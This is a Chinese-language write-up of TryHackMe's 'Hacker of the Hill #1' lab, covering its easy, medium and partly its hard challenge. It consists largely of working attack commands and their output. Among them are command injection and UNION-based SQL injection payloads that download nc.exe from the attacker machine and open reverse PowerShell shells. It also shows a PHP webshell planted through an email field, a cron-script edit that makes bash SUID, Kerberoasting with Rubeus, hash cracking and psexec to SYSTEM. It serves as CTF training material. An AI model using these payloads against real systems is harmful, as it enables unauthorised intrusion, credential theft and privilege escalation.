【Tryhackme】Hacker of the Hill #1

免責(zé)聲明

本文滲透的主機經(jīng)過合法授權(quán)。本文使用的工具和方法僅限學(xué)習(xí)交流使用,請不要將文中使用的工具和滲透思路用于任何非法用途,對此產(chǎn)生的一切后果,本人不承擔(dān)任何責(zé)任,也不對造成的任何誤用或損害負責(zé)。

Easy Challenge

服務(wù)發(fā)現(xiàn)

┌──(root??kali)-[~/tryhackme/hackerhill]
└─# nmap -sV -Pn 10.10.134.251    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 04:36 EDT
Nmap scan report for 10.10.134.251
Host is up (0.31s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
8001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
8002/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
9999/tcp open  abyss?

爆破8000端口的目錄

──(root??kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u 10.10.134.251:8000

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100

Error Log: /root/dirsearch/logs/errors-21-10-25_04-57-13.log

Target: 10.10.134.251:8000                                                                                                                                                                                                                  
                                                                                                                                                                                                                                            
[04:57:13] Starting: 
[04:57:22] 200 -    2KB - /about                                                 
[04:57:33] 200 -    2KB - /contact                                                                                
[04:57:47] 500 -  613B  - /public_html/robots.txt                                                              
[04:57:47] 200 -   30B  - /robots.txt

robots.txt顯示有一個cms

User-agent: *
Disallow: /vbcms

打開是一個登陸頁面,嘗試用admin:admin登陸,居然登陸上了。。。

登陸進去是一個頁面編輯界面,可以直接改網(wǎng)頁源代碼,嘗試寫php發(fā)現(xiàn)可以運行,那就簡單了,直接寫shell。。。

開啟一個端口監(jiān)聽,把shell寫進首頁,訪問,觸發(fā)反彈

┌──(root??kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.134.251] 59268
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 10:30:53 up  1:08,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
$ whoami
serv1

根據(jù)提示,第一個flag在/usr/games/fortune,去到這個網(wǎng)站兌換到tryhackme需要的flag

然后第二個,第三個按照指示去到/var/lib/rary/var/www/serv4/index.php起上面網(wǎng)站兌換指定flag

提權(quán)

傳linpeas.sh,發(fā)現(xiàn)/home/serv3/backups/backup.sh這個定時任務(wù)是用root身份執(zhí)行的,頻率為一分鐘一次

查看bash文件權(quán)限

serv1@web-serv:/tmp$ ls -alh /home/serv3/backups/backup.sh
ls -alh /home/serv3/backups/backup.sh
-r-xr-xr-x 1 serv3 serv3 52 Feb 15  2021 /home/serv3/backups/backup.sh

serv1沒有權(quán)限編輯這個文件,也就是說我們需要橫向提權(quán)到serv3?

/var/www/html/topSecretPrivescMethod找到一個secret.txt,看文件夾名字是提權(quán)方法,但是打開是一串亂碼

:8002/lesson/1這個php運行頁面,本來可以直接運行php反彈shell,但是因為頁面連接了一個谷歌前端框架,所以不能運行反彈不了shell

經(jīng)過一番努力。。。。。

回到上面那個頁面,寫入php反彈shell,拿到serv3的shell

┌──(root??kali)-[~/tryhackme/hackhill]
└─# nc -lnvp 4444                                                        1 ?
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.172.149] 33814
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 14:49:20 up  1:13,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)

我們寫入下面命令到backup.sh,使得bash命令成為一個SUID
echo "chmod 4777 /bin/bash" >> /home/serv3/backups/backup.sh

等待一分鐘以后,執(zhí)行/bin/bash -p拿到root權(quán)限

serv3@web-serv:/$ /bin/bash -p                                                                                                                                                                                                               
/bin/bash -p                                                                                                                                                                                                                                 
bash-4.4# id                                                                                                                                                                                                                                 
id                                                                                                                                                                                                                                           
uid=1002(serv3) gid=1002(serv3) euid=0(root) groups=1002(serv3)                                                                                                                                                                              
bash-4.4# cat /root/root.txt

Medium Challenge

服務(wù)發(fā)現(xiàn)

┌──(root??kali)-[~/tryhackme/hackhill]
└─# nmap -sV -Pn 10.10.48.179                                                                                                                                                                                                         130 ?
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 10:00 EDT
Nmap scan report for 10.10.48.179
Host is up (0.32s latency).
Not shown: 985 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
81/tcp   open  http          Microsoft IIS httpd 10.0
82/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-10-25 14:01:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
9999/tcp open  abyss?

中等難度是一臺windows機器,開了很多服務(wù),一個個查看

80,81,82都是http服務(wù),逐個爆破目錄

80

┌──(root??kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.48.179/_21-10-25_10-10-52.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-10-52.log

Target: http://10.10.48.179/

[10:10:53] Starting: 
[10:11:00] 200 -    2KB - /%3f/                                            
[10:11:00] 403 -  312B  - /%2e%2e//google.com                              
[10:11:00] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd            
[10:11:09] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[10:11:28] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd     
[10:11:33] 302 -    0B  - /dashboard  ->  /login                            
[10:11:48] 200 -    3KB - /login                                            
[10:11:48] 200 -    3KB - /login/                                           
[10:11:49] 302 -    0B  - /logout/  ->  /                                   
[10:11:49] 302 -    0B  - /logout  ->  /                                    
[10:12:26] 302 -    0B  - /profile  ->  /login                              
[10:12:45] 200 -    3KB - /signup

81

┌──(root??kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179:81

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.48.179-81/_21-10-25_10-27-15.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-27-15.log

Target: http://10.10.48.179:81/

[10:27:16] Starting: 
[10:27:22] 200 -    5KB - /%3f/                                            
[10:27:22] 403 -  312B  - /%2e%2e//google.com                              
[10:27:23] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd            
[10:27:31] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[10:27:57] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd     
[10:28:32] 400 -   24B  - /ping

82

┌──(root??kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179:82

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                      
                                                                                                                                                                                                                                             
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.48.179-82/_21-10-25_10-29-15.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-29-15.log

Target: http://10.10.48.179:82/

[10:29:16] Starting: 
[10:29:24] 403 -  312B  - /%2e%2e//google.com                              
[10:29:25] 404 -    1KB - /+CSCOE+/session_password.html                   
[10:29:25] 404 -    1KB - /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
[10:29:25] 404 -    1KB - /+CSCOE+/logon.html#form_title_text              
[10:29:25] 404 -    1KB - /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
[10:29:25] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd            
[10:29:26] 404 -    1KB - /.config/psi+/profiles/default/accounts.xml      
[10:29:41] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[10:30:15] 404 -    1KB - /bitrix/web.config                                
[10:30:17] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd     
[10:30:19] 404 -    1KB - /cms/Web.config                                   
[10:30:30] 404 -    1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/ 
[10:30:41] 404 -    1KB - /lang/web.config                                  
[10:30:50] 404 -    1KB - /modules/web.config                               
[10:31:00] 404 -    1KB - /plugins/web.config                               
[10:31:19] 404 -    1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt-orig.sql
[10:31:19] 404 -    1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt.sql
[10:31:24] 404 -    1KB - /web.config

80服務(wù)運行一個上傳服務(wù),但是只能指定.jpg文件上傳,試了繞不過去
81服務(wù)運行了一個ping域名的服務(wù),嘗試命令行繞過,貌似不行
82服務(wù)沒看到啥有用的東西

81端口看url:81/ping?id=1,測試了一下,存在sql注入,那么應(yīng)該這個才是攻擊點

枚舉數(shù)據(jù)庫

sqlmap -u "http://10.10.48.179:81/ping?id=1" -p "id"  --batch --dbms=mysql --technique B --dbs
available databases [2]:
[*] information_schema
[*] networkmonitor

其他信息

數(shù)據(jù)表:host 表字段:id,ip
用戶名:monitor_read@localhot
密碼:枚舉不出來

getshell

這個shell一直打不出來,這里參考大佬的方法
http://10.10.48.179/profile頁面,用戶名這個字段可以自由修改
而且每次修改完,上傳后的路徑隨即也會被改變
由此可以猜想上傳代碼可能為:

$old_username = 'admin'
$new_username = $GET['username']
system('mv ' . $old_username . ' '. $new_username)

因為$old_username這里是用戶可以控制的,也就是說可能存在命令行注入漏洞

驗證:
在攻擊機開啟tcpdump監(jiān)聽所有icmp包

tcpdump -i tun0 icmp

修改用戶名payload為:
admin_test | ping 10.13.21.169

如果監(jiān)聽能收到ping包,說明我們的命令注入成功

成功收到ping包:

┌──(root??kali)-[~]
└─# tcpdump -i tun0 icmp                                                                                                                                                                                                                 1 ?
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:36:08.012297 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 13, length 40
09:36:08.012335 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 13, length 40
09:36:09.008655 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 14, length 40
09:36:09.008693 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 14, length 40
09:36:10.024224 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 15, length 40
09:36:10.024241 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 15, length 40
09:36:11.047680 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 16, length 40
09:36:11.047696 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 16, length 40

把nc.exe傳到靶機,以便我們反彈shell

curl -H "Cookie:token=eyJ1c2VybmFtZSI6ImFkbWluIiwiY29va2llIjoiZWRkYjkzY2UxODY5OTkwZDMyY2Y3ZWMzYTQyYWQxYzgifQ==" -XPOST http://10.10.48.179/profile -d 'username=asd | powershell curl 10.13.21.169:8000/nc.exe -o nc.exe'

另起一個窗口監(jiān)聽
nc -lnvp 4242

靶機觸發(fā)payload:

admin1 | nc.exe 10.13.21.169 4242 -e powershell

收到反彈shell

┌──(root??kali)-[~]
└─# nc -lnvp 4242       
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.48.179] 50099
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\agamemnon\Desktop\WebApp\public> whoami
whoami
troy\agamemnon

C:\Users\agamemnon\Desktop拿到用戶agamemnon的flag

查看一共有多少個用戶

PS C:\> net users
net users

User accounts for \\TROY-DC

-------------------------------------------------------------------------------
achilles                 Administrator            agamemnon                
Guest                    hector                   helen                    
krbtgt                   patrocles

傳winPEASx64.exe枚舉,幾乎沒有什么有用的信息

第二個shell

由于我們之前已經(jīng)知道81端口存在一個sql注入,觀察這個webapp的功能,如果我們能夠改變host表ip這個字段的值,那么我們同樣也可以利用命令行注入拿到另外一個shell

經(jīng)過多翻測試,當前賬號沒有權(quán)限插入和修改數(shù)據(jù)庫里的數(shù)據(jù)

這里使用CONCAT函數(shù)把注入命令當做一個字符串拼接到返回的結(jié)果當中,因為id=9999查詢不到數(shù)據(jù),返回的是一個空串,UNION把結(jié)果和"|ipconfig"連接在了一起,所以程序最后執(zhí)行的命令是ping |ipconfig

payload如下:
id=9999 UNION SELECT NULL,CONCAT("|","ipconfig")-- -
注入用burpsuite時上面的payload要用urlencode加密一下,否則會報400

由于我們現(xiàn)在已經(jīng)可以注入命令,像前面那個shell一樣我們把nc.exe傳到靶機,然后再攻擊機開啟監(jiān)聽,拿到反彈shell

傳nc.exe

id=9999 UNION SELECT NULL,CONCAT("|","powershell curl 10.13.21.169:8000/nc.exe -o nc.exe")-- -

本地監(jiān)聽

nc -lnvp 4444

反彈

id=9999 UNION SELECT NULL,CONCAT("|","nc.exe 10.13.21.169 4444 -e powershell")-- -

拿shell

──(root??kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.48.179] 52658
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\helen\Desktop\WebApp\h1-tryhackme-medium-two-main\public> ls
PS C:\Users\helen\Desktop\WebApp\h1-tryhackme-medium-two-main\public> whoami
whoami
troy\helen

C:\Users\helen\Desktop拿到helen的flag

第三個shell

82端口這個webapp的getshell非常的trick,以下解法參考了大佬的方法

分析

首先這是一個提交框,數(shù)據(jù)被提交到后臺以后,在第二頁的源代碼注釋會出現(xiàn)這樣一行文字:

Ticket saved to ../tickets/

但是無論我們怎么訪問,正常情況下都是不能訪問tickets這個文件夾的

因為按照之前的經(jīng)驗,所有的webapp其實都是在public下,所以只要我們能夠引導(dǎo)這個路徑到public下,理論上我們就能在web上訪問到tikeit的內(nèi)容

經(jīng)過測試Email Address這個字段可以接受雙引號,郵箱格式結(jié)尾也允許.php

因此我們的payload如下:

Email Address: "../public/"@admin.php
Name: <?php system(_GET['c']); ?\> Message: <?php system(_GET['c']); ?>

上傳以后顯示:

saved to ../tickets/../public/@aaa.php

觸發(fā)訪問:

:82/@aaa.php?c=whoami

頁面顯示whoami命令返回

現(xiàn)在我們得到了一個簡單的交互式shell

傳nc.exe

:82/@aaa.php?c=powershell curl 10.13.21.169:8000/nc.exe -o nc.exe

本地監(jiān)聽

nc -lnvp 4445

反彈

:82/@aaa.php?c=nc.exe 10.13.21.169 4445 -e powershell

拿shell

┌──(root??kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.48.179] 49810
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\hector\Desktop\WebApp\h1-tryhackme-medium-three-main\public> whoami
whoami
troy\hector

C:\Users\hector\Desktop拿到hector的flag

提權(quán)

把Rubeus.exe傳到靶機

PS C:\Users\hector\Desktop> powershell curl 10.13.21.169:8000/Rubeus.exe -o Rubeus.exe
powershell curl 10.13.21.169:8000/Rubeus.exe -o Rubeus.exe

dump出用戶哈希存到hash.txt

PS C:\Users\hector\Desktop> .\Rubeus.exe kerberoast /outfile:dump.txt
.\Rubeus.exe kerberoast /outfile:dump.txt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : troy.thm
[*] Searching path 'LDAP://TROY-DC.troy.thm/DC=troy,DC=thm' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : achilles
[*] DistinguishedName      : CN=Achilles,OU=Created Users,DC=troy,DC=thm
[*] ServicePrincipalName   : TIME/TROY-DC.TROY.THM
[*] PwdLastSet             : 19/02/2021 18:32:09
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\hector\Desktop\dump.txt

[*] Roasted hashes written to : C:\Users\hector\Desktop\dump.txt

把dump.txt傳回kali,用john破解

┌──(root??kali)-[~/tryhackme/hackerhill]
└─# john dump.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
winniethepooh    (?)
1g 0:00:00:00 DONE (2021-10-28 02:40) 50.00g/s 153600p/s 153600c/s 153600C/s slimshady..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed

得到achilles的登陸密碼

登陸Achilles的賬號,發(fā)現(xiàn)原來已經(jīng)是system權(quán)限

┌──(root??kali)-[~/windowns-privilege/impacket]
└─# /opt/impacket/build/scripts-3.9/psexec.py TROY.thm/Achilles:winniethepooh@10.10.48.179
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.48.179.....
[*] Found writable share ADMIN$
[*] Uploading file cbyYanQp.exe
[*] Opening SVCManager on 10.10.48.179.....
[*] Creating service CRPo on 10.10.48.179.....
[*] Starting service CRPo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1757]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

因為已經(jīng)拿到了system權(quán)限,至此我們拿到了此靶機的所有flag

Hard Challenge

服務(wù)發(fā)現(xiàn)

┌──(root??kali)-[~/tryhackme/hackerhill]
└─# nmap -sV -Pn 10.10.243.173    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-28 04:04 EDT
Nmap scan report for 10.10.243.173
Host is up (0.33s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
81/tcp   open  http    nginx 1.18.0 (Ubuntu)
82/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8888/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.8.5)
9999/tcp open  abyss?

開了兩個ssh服務(wù),以及4個http服務(wù),8888那個端口用的是python做的webapp

我們一個個查看。。。

81端口

目錄爆破

┌──(root??kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -u http://10.10.243.173:81/ -e* -t 100

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                      
                                                                                                                                                                                                                                             
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.243.173-81/-_21-10-28_08-54-57.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_08-54-57.log

Target: http://10.10.243.173:81/

[08:54:59] Starting:  
[08:55:40] 200 -  409KB - /access_log                                       
[08:55:52] 301 -  178B  - /images  ->  http://10.10.243.173/images/          
[08:55:52] 403 -  564B  - /images/                                          
                                                                             
Task Completed

/access_log 第一個訪問記錄暴露一個文件夾/s3cr3t_area,打開是一張圖片,感覺沒啥有用的信息。

82端口

目錄爆破

┌──(root??kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -u http://10.10.243.173:82/ -e* -t 100           2 ?

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak
HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.243.173-82/-_21-10-28_08-49-12.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_08-49-12.log

Target: http://10.10.243.173:82/

[08:49:13] Starting: 
[08:49:32] 400 -  304B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd                                                                                            
[08:50:35] 400 -  304B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd                                                                                                                                                                      
[08:50:50] 200 -   21B  - /feed                                                           
[08:50:55] 301 -  316B  - /images  ->  http://10.10.243.173:82/images/                                                  
[08:51:23] 200 -    2KB - /search                                                            
[08:51:31] 301 -    0B  - /t  ->  /t/

:82/t/r/y/h/a/r/d/e/r/spamlog.log找到信息

Nahamsec made me do it :(

沒卵用

一個搜索框,在burpsuite上把搜索請求信息截取出來,保存到data2文件

└─# cat data2              
POST /search HTTP/1.1
Host: 10.10.243.173:82
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Origin: http://10.10.243.173:82
Connection: close
Referer: http://10.10.243.173:82/search
Upgrade-Insecure-Requests: 1

q=a

sqlmap測試證實存在sql注入,payload為:
sqlmap -r data2 --level=5 --risk=3 --dbms=mysql

  Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=1%' AND 3240=3240 AND 'UEDj%'='UEDj

枚舉到的信息有:

數(shù)據(jù)庫:hillpics
表:hill
當前用戶:'hill'@'localhost'
密碼:無法獲取
當前用戶角色和權(quán)限: USAGE (最低權(quán)限)
os-shell:無法獲取
其余沒有什么有用的信息

8888端口

爆破目錄

┌──(root??kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.243.173:8888

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak
HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.243.173-8888/_21-10-28_09-36-47.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_09-36-47.log

Target: http://10.10.243.173:8888/

[09:36:47] Starting: 
[09:38:05] 200 -  135B  - /apps                                             
[09:39:19] 200 -   45B  - /users                                            
                                                                             
Task Completed

/apps打印:

{"app1": {"name": "online file storage"}, "app2": {"name": "media player"}, "app3": {"name": "file sync"}, "app4": {"name": "/users"}}

/users打?。?/p> 

{"user": {"davelarkin": "totallysecurehuh"}}

這里爆出了davelarkin的ssh登錄憑證,通過2222端口拿到了flag4

┌──(root??kali)-[~/.ssh]
└─# ssh davelarkin@10.10.243.173 -p 2222                                                                                                                                                                                              255 ?
The authenticity of host '[10.10.243.173]:2222 ([10.10.243.173]:2222)' can't be established.
ECDSA key fingerprint is SHA256:D0vPRUo5EfUivVKiJf3i6JIOF50DxmKg/avxmu6bx4o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.243.173]:2222' (ECDSA) to the list of known hosts.
davelarkin@10.10.243.173's password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1037-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

davelarkin@a9ef0531077f:~$ whoami
davelarkin
davelarkin@a9ef0531077f:~$ ls
api  bin  container4_flag.txt
davelarkin@a9ef0531077f:~$ cat container4_flag.txt

傳linpeas發(fā)現(xiàn)是在docker內(nèi)

滲透80端口的http服務(wù)

目錄爆破

┌──(root??kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.243.173                                                                      

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.243.173/_21-10-28_04-15-43.txt

Error Log: /root/dirsearch/logs/errors-21-10-28_04-15-43.log

Target: http://10.10.243.173/

[04:15:44] Starting: 
                                       
[04:16:50] 200 -  136B  - /api                                              
[04:16:50] 200 -  136B  - /api/    
[04:17:27] 200 -    2KB - /login                                            
[04:17:28] 200 -    2KB - /login/                                           
[04:17:29] 302 -    0B  - /logout  ->  /login                               
[04:17:29] 302 -    0B  - /logout/  ->  /login                              
[04:17:52] 302 -    0B  - /shell  ->  /login                                
[04:17:52] 302 -    0B  - /shell/  ->  /login

我們看到至少有三個文件夾,shell這個文件夾應(yīng)該有有趣的東西,但是重定向到了login
api文件夾可以正常打開,打印了一串json,暴露出來Apache,php,mysql的版本號,數(shù)據(jù)庫名字:servermanager

{"name":"Server Manager","stack":{"nginx":"Apache/2.4.41 (Ubuntu)","php":"7.4.3","mysql":{"version":"5.6","database":"servermanager"}}}

login頁面源代碼顯示,如果成功登錄,將被導(dǎo)向一個token頁面,并且可以攜帶一個參數(shù)

<script>
    $('.login').click( function(){

        $.post('/api/user/login',{
            'username'  :   $('input[name="username"]').val(),
            'password'  :   $('input[name="password"]').val()
        },function(resp){
            if( resp.login ){
                window.location = '/token?token=' + resp.token;
            }else{
                alert( resp.error );
            }
        });


    })
</script>

看樣子像是一個servermanager數(shù)據(jù)庫的登陸頁面。不知道用戶名

繼續(xù)對/api/user爆破

┌──(root??kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.243.173/api/user

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.243.173/-api-user_21-10-28_09-49-39.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_09-49-39.log

Target: http://10.10.243.173/api/user/

[09:49:41] Starting: 
[09:51:22] 200 -   53B  - /api/user/login                                   
[09:51:22] 200 -   53B  - /api/user/login/                                  
